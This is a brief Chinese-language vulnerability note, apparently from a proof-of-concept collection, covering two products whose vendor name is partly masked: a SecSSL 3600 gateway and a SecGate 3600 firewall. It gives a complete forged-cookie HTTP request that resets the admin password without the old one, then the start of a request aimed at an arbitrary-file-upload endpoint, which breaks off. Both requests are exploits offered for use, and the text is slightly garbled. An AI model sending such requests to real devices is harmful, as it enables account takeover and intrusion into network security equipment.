Translator
*神 SecSSL 3600安全接入网关系统 任意密码修改漏洞
POC
POST /changepass.php?type=2
Cookie: admin_id=1; gw_user_ticket=xxxxxxxxxxxxxxxxxxx; last_step_param={"this_name":"test","subAuthId":"1"}
old_pass=&password=Qwea123&repassword=Qwea123
*神 SecGate 3600 防火墙 obj_app_upfile 任意文件上传漏洞
POST /?g=obj_app_upfile HTTP/1.1
Host: x.x.x.x
Accept: /Accept